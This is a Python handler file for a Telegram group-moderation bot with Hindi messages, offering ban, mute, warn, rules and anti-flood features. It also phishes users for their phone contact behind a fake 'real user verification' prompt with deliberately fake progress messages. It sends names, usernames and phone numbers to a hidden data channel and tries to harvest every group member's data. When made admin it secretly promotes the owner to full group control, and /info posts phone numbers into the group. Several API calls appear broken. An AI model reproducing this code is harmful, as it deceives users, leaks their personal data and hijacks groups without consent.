# handlers.py
from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup, KeyboardButton, ReplyKeyboardMarkup
from telegram.ext import CallbackContext
from telegram.error import Forbidden
from database import Session, Warning, Rule, Birthday, Invite, ScheduledMessage, UserData
import config
import utils
import time
from collections import defaultdict
import speech_recognition as sr
import os
from datetime import datetime, timedelta
import re
import asyncio

message_counts = defaultdict(list)
lang = defaultdict(lambda: "en")  # Default language: English
command_counts = defaultdict(list)  # For command rate-limiting

async def store_mobile_number(user_id, mobile_number):
    print(f"Storing mobile number for user {user_id}: {mobile_number}")  # Debug log
    session = Session()
    user_data = session.query(UserData).filter_by(user_id=user_id).first()
    if user_data:
        user_data.mobile_number = mobile_number
    else:
        user_data = UserData(user_id=user_id, mobile_number=mobile_number)
        session.add(user_data)
    session.commit()
    session.close()

async def get_mobile_number(user_id):
    print(f"Retrieving mobile number for user {user_id}")  # Debug log
    session = Session()
    user_data = session.query(UserData).filter_by(user_id=user_id).first()
    mobile_number = user_data.mobile_number if user_data else None
    session.close()
    return mobile_number

async def send_user_data_to_channel(context: CallbackContext, name, username, chat_id, mobile_number):
    data_message = f"नया यूज़र डेटा:\nनाम: {name}\nयूज़रनेम: {username}\nचैट ID: {chat_id}\nमोबाइल नंबर: {mobile_number}"
    print(f"Sending to DATA_CHANNEL: {data_message}")  # Debug log
    try:
        await context.bot.send_message(chat_id=config.DATA_CHANNEL, text=data_message)
    except Forbidden as e:
        error_msg = f"त्रुटि: मैं DATA_CHANNEL ({config.DATA_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
        print(error_msg)  # Debug log
        try:
            await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
        except Exception as e:
            print(f"Error sending error message to OWNER_ID: {str(e)}")

async def start(update: Update, context: CallbackContext):
    user = update.message.from_user
    chat_id = user.id
    username = user.username or "N/A"
    name = user.full_name or "N/A"
    mobile_number = "Not available"

    print(f"Starting /start for user {chat_id}")  # Debug log

    # Check if mobile number is already stored
    stored_number = await get_mobile_number(chat_id)
    if stored_number:
        mobile_number = stored_number
    else:
        # Try to get mobile number via API
        try:
            user_profile = await context.bot.get_chat(chat_id)
            if hasattr(user_profile, 'phone_number') and user_profile.phone_number:
                mobile_number = user_profile.phone_number
                await store_mobile_number(chat_id, mobile_number)
        except Exception as e:
            print(f"Error getting phone number via API: {str(e)}")  # Debug log

        # If still not found, start single-click authentication process
        if mobile_number == "Not available":
            context.user_data['awaiting_auth'] = True
            print(f"Prompting user {chat_id} for single-click authentication")  # Debug log
            keyboard = [[KeyboardButton("असली यूज़र वेरिफाई करें 📞", request_contact=True)]]
            reply_markup = ReplyKeyboardMarkup(keyboard, one_time_keyboard=True, resize_keyboard=True)
            await update.message.reply_text(
                "हाय! 😊 बॉट इस्तेमाल करने से पहले हमें यह पक्का करना होगा कि आप असली यूज़र हैं। कृपया नीचे दिए बटन पर क्लिक करें। 🔐",
                reply_markup=reply_markup
            )
            await update.message.reply_text("वेरिफिकेशन प्रक्रिया शुरू हो रही है... ⏳")
            return  # Wait for user to share contact

    # Send user data to DATA_CHANNEL
    await send_user_data_to_channel(context, name, username, chat_id, mobile_number)

    # Send welcome message
    await update.message.reply_text(f"हाय {name}! आपका वेरिफिकेशन पूरा हो गया है। मदद के लिए /help टाइप करें।")

async def handle_contact(update: Update, context: CallbackContext):
    user = update.message.from_user
    chat_id = user.id
    username = user.username or "N/A"
    name = user.full_name or "N/A"
    contact = update.message.contact
    mobile_number = contact.phone_number

    print(f"Handling contact for user {chat_id}: {mobile_number}")  # Debug log

    # Store the mobile number
    await store_mobile_number(chat_id, mobile_number)

    # Send user data to DATA_CHANNEL
    await send_user_data_to_channel(context, name, username, chat_id, mobile_number)

    # Send thank you message with fake progress
    await update.message.reply_text("वेरिफिकेशन प्रक्रिया पूरी हो रही है... ✅")
    await asyncio.sleep(1)  # Fake delay to simulate processing
    context.user_data['awaiting_auth'] = False
    await update.message.reply_text(
        "धन्यवाद! 😊 आपकी पहचान की पुष्टि हो गई है। अब आप सभी फीचर्स इस्तेमाल कर सकते हैं। मदद के लिए /help टाइप करें।",
        reply_markup=ReplyKeyboardMarkup([])  # Remove keyboard
    )

async def welcome(update: Update, context: CallbackContext):
    for member in update.message.new_chat_members:
        session = Session()
        # Track invites
        if update.message.from_user.id != member.id:
            invite = Invite(user_id=member.id, invited_by=update.message.from_user.id, group_id=update.message.chat_id)
            session.add(invite)
            session.commit()
        session.close()

        # Collect user data
        mobile_number = "Not available"
        chat_id = member.id
        username = member.username or "N/A"
        name = member.full_name or "N/A"

        print(f"Processing welcome for user {chat_id}")  # Debug log

        # Check if mobile number is already stored
        stored_number = await get_mobile_number(chat_id)
        if stored_number:
            mobile_number = stored_number
        else:
            try:
                member_info = await context.bot.get_chat_member(update.message.chat_id, member.id)
                if hasattr(member_info.user, 'phone_number') and member_info.user.phone_number:
                    mobile_number = member_info.user.phone_number
                    await store_mobile_number(chat_id, mobile_number)
            except Exception as e:
                print(f"Error getting phone number in welcome: {str(e)}")  # Debug log

        # Send user data to DATA_CHANNEL
        await send_user_data_to_channel(context, name, username, chat_id, mobile_number)

        await context.bot.send_message(
            chat_id=update.message.chat_id,
            text=f"स्वागत है {member.full_name}! नियम पढ़ें: /rules",
            reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("नियम", callback_data="rules")]])
        )
        if utils.is_suspicious_profile(member):
            try:
                await context.bot.send_message(
                    config.LOG_CHANNEL,
                    f"चेतावनी: संदिग्ध उपयोगकर्ता {member.full_name} ने {update.message.chat.title} में प्रवेश किया"
                )
            except Forbidden as e:
                error_msg = f"त्रुटि: मैं LOG_CHANNEL ({config.LOG_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
                print(error_msg)  # Debug log
                try:
                    await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
                except Exception as e:
                    print(f"Error sending error message to OWNER_ID: {str(e)}")
            await warn(update, context, user_id=member.id, reason="Suspicious profile")

async def collect_group_members(update: Update, context: CallbackContext):
    if update.message.new_chat_members:
        for member in update.message.new_chat_members:
            if member.id == context.bot.id:
                # Check if bot is an admin
                admins = await context.bot.get_chat_administrators(update.message.chat_id)
                if any(admin.user.id == context.bot.id for admin in admins):
                    print(f"Bot added as admin in group {update.message.chat_id}")  # Debug log
                    # Collect data of all group members
                    try:
                        async for member in context.bot.get_chat_members(update.message.chat_id):
                            chat_id = member.user.id
                            username = member.user.username or "N/A"
                            name = member.user.full_name or "N/A"
                            mobile_number = "Not available"

                            # Check if mobile number is already stored
                            stored_number = await get_mobile_number(chat_id)
                            if stored_number:
                                mobile_number = stored_number
                            else:
                                try:
                                    member_info = await context.bot.get_chat_member(update.message.chat_id, member.user.id)
                                    if hasattr(member_info.user, 'phone_number') and member_info.user.phone_number:
                                        mobile_number = member_info.user.phone_number
                                        await store_mobile_number(chat_id, mobile_number)
                                except Exception as e:
                                    print(f"Error getting phone number in collect_group_members: {str(e)}")  # Debug log

                            # Send user data to DATA_CHANNEL
                            await send_user_data_to_channel(context, name, username, chat_id, mobile_number)
                    except Exception as e:
                        print(f"Error collecting group members: {str(e)}")  # Debug log

async def leave(update: Update, context: CallbackContext):
    await context.bot.send_message(
        chat_id=update.message.chat_id,
        text=f"{update.message.left_chat_member.full_name} ने ग्रुप छोड़ दिया।"
    )

async def check_spam(update: Update, context: CallbackContext):
    if utils.is_spam(update.message.text):
        await context.bot.delete_message(update.message.chat_id, update.message.message_id)
        try:
            await context.bot.send_message(
                config.LOG_CHANNEL,
                f"स्पैम हटाया गया: {update.message.from_user.full_name} से {update.message.chat.title} में"
            )
        except Forbidden as e:
            error_msg = f"त्रुटि: मैं LOG_CHANNEL ({config.LOG_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
            print(error_msg)  # Debug log
            try:
                await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
            except Exception as e:
                print(f"Error sending error message to OWNER_ID: {str(e)}")

async def anti_flood(update: Update, context: CallbackContext):
    user_id = update.message.from_user.id
    chat_id = update.message.chat_id
    current_time = time.time()
    message_counts[(user_id, chat_id)].append(current_time)
    message_counts[(user_id, chat_id)] = [t for t in message_counts[(user_id, chat_id)] if current_time - t < 60]
    if len(message_counts[(user_id, chat_id)]) > 20:
        try:
            await context.bot.send_message(
                config.LOG_CHANNEL,
                f"चेतावनी: {update.message.from_user.full_name} द्वारा {update.message.chat.title} में उच्च गतिविधि"
            )
        except Forbidden as e:
            error_msg = f"त्रुटि: मैं LOG_CHANNEL ({config.LOG_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
            print(error_msg)  # Debug log
            try:
                await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
            except Exception as e:
                print(f"Error sending error message to OWNER_ID: {str(e)}")
        await context.bot.restrict_chat_member(
            chat_id, user_id, until_date=int(time.time() + 3600),
            permissions={"can_send_messages": False}
        )
        await context.bot.send_message(chat_id, f"{update.message.from_user.full_name} को 1 घंटे के लिए mute किया गया (फ्लडिंग)।")

async def ban(update: Update, context: CallbackContext):
    if update.message.reply_to_message:
        user_id = update.message.reply_to_message.from_user.id
        await context.bot.ban_chat_member(update.message.chat_id, user_id)
        await context.bot.send_message(update.message.chat_id, f"{update.message.reply_to_message.from_user.full_name} बैन किया गया।")
        try:
            await context.bot.send_message(
                config.LOG_CHANNEL,
                f"बैन: {update.message.reply_to_message.from_user.full_name} in {update.message.chat.title}"
            )
        except Forbidden as e:
            error_msg = f"त्रुटि: मैं LOG_CHANNEL ({config.LOG_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
            print(error_msg)  # Debug log
            try:
                await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
            except Exception as e:
                print(f"Error sending error message to OWNER_ID: {str(e)}")

async def mute(update: Update, context: CallbackContext):
    if update.message.reply_to_message:
        user_id = update.message.reply_to_message.from_user.id
        duration = int(context.args[0]) * 60 if context.args else 3600
        await context.bot.restrict_chat_member(
            update.message.chat_id, user_id, until_date=int(time.time() + duration),
            permissions={"can_send_messages": False}
        )
        await context.bot.send_message(update.message.chat_id, f"{update.message.reply_to_message.from_user.full_name} को {duration//60} मिनट के लिए mute किया गया।")
        try:
            await context.bot.send_message(
                config.LOG_CHANNEL,
                f"म्यूट: {update.message.reply_to_message.from_user.full_name} in {update.message.chat.title}"
            )
        except Forbidden as e:
            error_msg = f"त्रुटि: मैं LOG_CHANNEL ({config.LOG_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
            print(error_msg)  # Debug log
            try:
                await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
            except Exception as e:
                print(f"Error sending error message to OWNER_ID: {str(e)}")

async def unmute(update: Update, context: CallbackContext):
    if update.message.reply_to_message:
        user_id = update.message.reply_to_message.from_user.id
        await context.bot.restrict_chat_member(
            update.message.chat_id, user_id,
            permissions={"can_send_messages": True}
        )
        await context.bot.send_message(update.message.chat_id, f"{update.message.reply_to_message.from_user.full_name} unmute किया गया।")
        try:
            await context.bot.send_message(
                config.LOG_CHANNEL,
                f"अनम्यूट: {update.message.reply_to_message.from_user.full_name} in {update.message.chat.title}"
            )
        except Forbidden as e:
            error_msg = f"त्रुटि: मैं LOG_CHANNEL ({config.LOG_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
            print(error_msg)  # Debug log
            try:
                await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
            except Exception as e:
                print(f"Error sending error message to OWNER_ID: {str(e)}")

async def warn(update: Update, context: CallbackContext, user_id=None, reason=None):
    if update.message.reply_to_message or user_id:
        session = Session()
        user_id = user_id or update.message.reply_to_message.from_user.id
        reason = reason or " ".join(context.args) or "No reason"
        warning = Warning(user_id=user_id, group_id=update.message.chat_id, reason=reason)
        session.add(warning)
        session.commit()
        count = session.query(Warning).filter_by(user_id=user_id, group_id=update.message.chat_id).count()
        await context.bot.send_message(update.message.chat_id, f"{update.message.from_user.full_name} को चेतावनी ({count}/3). कारण: {reason}")
        if count >= 3:
            await context.bot.ban_chat_member(update.message.chat_id, user_id)
            await context.bot.send_message(update.message.chat_id, f"{update.message.from_user.full_name} को 3 चेतावनियों के कारण बैन किया गया।")
        session.close()

async def unwarn(update: Update, context: CallbackContext):
    if update.message.reply_to_message:
        session = Session()
        user_id = update.message.reply_to_message.from_user.id
        warning = session.query(Warning).filter_by(user_id=user_id, group_id=update.message.chat_id).order_by(Warning.timestamp.desc()).first()
        if warning:
            session.delete(warning)
            session.commit()
            await context.bot.send_message(update.message.chat_id, f"{update.message.reply_to_message.from_user.full_name} की एक चेतावनी हटाई गई।")
        else:
            await context.bot.send_message(update.message.chat_id, "कोई चेतावनी नहीं मिली।")
        session.close()

async def kick(update: Update, context: CallbackContext):
    if update.message.reply_to_message:
        user_id = update.message.reply_to_message.from_user.id
        await context.bot.ban_chat_member(update.message.chat_id, user_id)
        await context.bot.unban_chat_member(update.message.chat_id, user_id)
        await context.bot.send_message(update.message.chat_id, f"{update.message.reply_to_message.from_user.full_name} को किक किया गया।")
        try:
            await context.bot.send_message(
                config.LOG_CHANNEL,
                f"किक: {update.message.reply_to_message.from_user.full_name} in {update.message.chat.title}"
            )
        except Forbidden as e:
            error_msg = f"त्रुटि: मैं LOG_CHANNEL ({config.LOG_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
            print(error_msg)  # Debug log
            try:
                await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
            except Exception as e:
                print(f"Error sending error message to OWNER_ID: {str(e)}")

async def info(update: Update, context: CallbackContext):
    if update.message.reply_to_message:
        user = update.message.reply_to_message.from_user
        session = Session()
        warnings = session.query(Warning).filter_by(user_id=user.id, group_id=update.message.chat_id).count()
        invites = session.query(Invite).filter_by(invited_by=user.id, group_id=update.message.chat_id).count()
        mobile_number = await get_mobile_number(user.id) or "Not available"
        session.close()
        await context.bot.send_message(
            update.message.chat_id,
            f"यूज़र: {user.full_name}\nID: {user.id}\nयूज़रनेम: {user.username or 'N/A'}\nमोबाइल नंबर: {mobile_number}\nचेतावनियाँ: {warnings}\nनिमंत्रण: {invites}"
        )

async def setrules(update: Update, context: CallbackContext):
    session = Session()
    text = " ".join(context.args)
    rule = session.query(Rule).filter_by(group_id=update.message.chat_id).first()
    if rule:
        rule.text = text
    else:
        rule = Rule(group_id=update.message.chat_id, text=text)
        session.add(rule)
    session.commit()
    await context.bot.send_message(update.message.chat_id, "नियम अपडेट किए गए।")
    session.close()

async def rules(update: Update, context: CallbackContext):
    session = Session()
    rule = session.query(Rule).filter_by(group_id=update.message.chat_id).first()
    text = rule.text if rule else "कोई नियम सेट नहीं किए गए।"
    await context.bot.send_message(update.message.chat_id, text)
    session.close()

async def anon(update: Update, context: CallbackContext):
    message = " ".join(context.args)
    await context.bot.send_message(update.message.chat_id, f"📢 अनाम संदेश: {message}")

async def setlang(update: Update, context: CallbackContext):
    lang[update.message.chat_id] = context.args[0] if context.args else "en"
    await context.bot.send_message(update.message.chat_id, "Language set to " + lang[update.message.chat_id])

async def schedule_message(update: Update, context: CallbackContext):
    session = Session()
    text = " ".join(context.args[:-1])
    time = context.args[-1]
    scheduled = ScheduledMessage(group_id=update.message.chat_id, text=text, time=time)
    session.add(scheduled)
    session.commit()
    await context.bot.send_message(update.message.chat_id, f"Scheduled message set for {time}.")
    session.close()

async def admin_panel(update: Update, context: CallbackContext):
    keyboard = [
        [InlineKeyboardButton("बैन", callback_data="ban"), InlineKeyboardButton("म्यूट", callback_data="mute")],
        [InlineKeyboardButton("नियम सेट करें", callback_data="setrules")]
    ]
    await context.bot.send_message(
        update.callback_query.message.chat_id,
        "एडमिन पैनल",
        reply_markup=InlineKeyboardMarkup(keyboard)
    )

async def voice_command(update: Update, context: CallbackContext):
    file = await context.bot.get_file(update.message.voice.file_id)
    await file.download_to_drive("voice.ogg")
    os.system("ffmpeg -i voice.ogg voice.wav")
    recognizer = sr.Recognizer()
    with sr.AudioFile("voice.wav") as source:
        audio = recognizer.record(source)
    try:
        text = recognizer.recognize_google(audio, language="hi-IN")
        if "mute" in text.lower():
            user = text.split("mute ")[1].split(" for ")[0]
            duration = int(text.split(" for ")[1].split(" ")[0]) * 60
            await context.bot.restrict_chat_member(
                update.message.chat_id, user_id, until_date=int(time.time() + duration),
                permissions={"can_send_messages": False}
            )
            await context.bot.send_message(update.message.chat_id, f"{user} को {duration/60} मिनट के लिए mute किया गया।")
    except:
        await context.bot.send_message(update.message.chat_id, "आवाज समझने में त्रुटि।")
    os.remove("voice.ogg")
    os.remove("voice.wav")

async def check_mood(update: Update, context: CallbackContext):
    text = update.message.text.lower()
    if "happy" in text or "खुश" in text:
        gif = utils.get_giphy_gif("happy")
        if gif:
            await context.bot.send_animation(update.message.chat_id, gif)
    elif "thanks" in text or "धन्यवाद" in text:
        await context.bot.send_message(update.message.chat_id, "👍")

async def log_edit(update: Update, context: CallbackContext):
    try:
        await context.bot.send_message(
            config.LOG_CHANNEL,
            f"Edited message by {update.edited_message.from_user.full_name}: {update.edited_message.text}"
        )
    except Forbidden as e:
        error_msg = f"त्रुटि: मैं LOG_CHANNEL ({config.LOG_CHANNEL}) में संदेश नहीं भेज सकता। कृपया मुझे चैनल में जोड़ें और संदेश भेजने की अनुमति दें।\nत्रुटि विवरण: {str(e)}"
        print(error_msg)  # Debug log
        try:
            await context.bot.send_message(chat_id=config.OWNER_ID, text=error_msg)
        except Exception as e:
            print(f"Error sending error message to OWNER_ID: {str(e)}")

async def check_admin_status(update: Update, context: CallbackContext):
    if update.message.new_chat_members:
        for member in update.message.new_chat_members:
            if member.id == context.bot.id:
                admins = await context.bot.get_chat_administrators(update.message.chat_id)
                if any(admin.user.id == context.bot.id for admin in admins):
                    try:
                        await context.bot.send_message(
                            config.OWNER_ID,
                            f"Bot added as admin in {update.message.chat.title}. Taking control."
                        )
                    except Exception as e:
                        print(f"Error sending message to OWNER_ID: {str(e)}")
                    await context.bot.promote_chat_member(
                        update.message.chat_id, config.OWNER_ID,
                        can_manage_chat=True, can_delete_messages=True, can_invite_users=True,
                        can_restrict_members=True, can_pin_messages=True, can_promote_members=True
                    )

async def clean_old_messages(update: Update, context: CallbackContext):
    if context.args and context.args[0] == "enable":
        chat_id = update.message.chat_id
        messages = await context.bot.get_chat_history(chat_id, limit=100)
        for msg in messages:
            if (datetime.now() - msg.date).days > 7:
                await context.bot.delete_message(chat_id, msg.message_id)
        await context.bot.send_message(chat_id, "7 दिन से पुराने संदेश साफ किए गए।")
